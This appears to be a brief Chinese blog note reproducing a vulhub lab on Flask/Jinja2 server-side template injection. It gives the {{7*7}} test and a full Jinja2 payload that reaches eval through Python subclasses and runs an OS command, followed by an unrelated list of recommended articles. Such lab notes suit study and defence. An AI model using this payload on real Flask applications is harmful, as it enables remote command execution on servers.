Flask(Jinja2) 服务端模板注入漏洞(SSTI)

XXX_WXY2023-11-09 11:41

Flask(Jinja2) 服务端模板注入漏洞(SSTI)

参考 https://www.freebuf.com/articles/web/260504.html

验证漏洞存在 ?name={{7*7}}

回显49说明漏洞存在

vulhub给出的payload:

python 复制代码 
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}
相关推荐
用户27784491049939 分钟前
Python打造Excel记账模板,摸鱼时间也能轻松理财
人工智能·python
闲人编程15 分钟前
OpenCV图像矩与形状匹配完全指南
python·opencv·图像识别
一个天蝎座 白勺 程序猿1 小时前
Python爬虫(8)Python数据存储实战:JSON文件读写与复杂结构化数据处理指南
爬虫·python·json
Tech Synapse1 小时前
打造企业级AI文案助手:GPT-J+Flask全栈开发实战
人工智能·gpt·flask
q_q王1 小时前
dify对接飞书云文档,并且将图片传入飞书文档
python·大模型·飞书·dify·智能体·图片展示
noravinsc1 小时前
django filter 排除字段
后端·python·django
zandy10112 小时前
嵌入式BI开发指南:如何通过衡石API将分析能力集成到业务系统?
开发语言·python·嵌入式
曲幽2 小时前
零基础快速搭建AI绘画网站!用Gradio玩转Stable Diffusion
python·ai作画·stable diffusion·gradio·diffusers·webui
xiaoniu6672 小时前
毕业设计-基于机器学习入侵检测系统
网络·安全·web安全
2401_890665863 小时前
免费送源码:Java+ssm+HTML 三分糖——甜品店网站设计与实现 计算机毕业设计原创定制
java·python·微信小程序·html·php·课程设计·android-studio
热门推荐
01西电B测-计算机网络综合实验(含验收问题)02KGG转MP3工具|非KGM文件|解密音频03从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑04YOLOv5改进 | 添加CA注意力机制 + 增加预测层 + 更换损失函数之GIoU05yolov8,yolo11,yolo12 服务器训练到部署全流程 笔记06我决定放弃搞 Java 了07Coze扣子平台完整体验和实践(附国内和国际版对比)08YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】09DeepSeek各版本说明与优缺点分析10yolov8实战第五天——yolov8+ffmpg实时视频流检测并进行实时推流——(推流,保姆教学)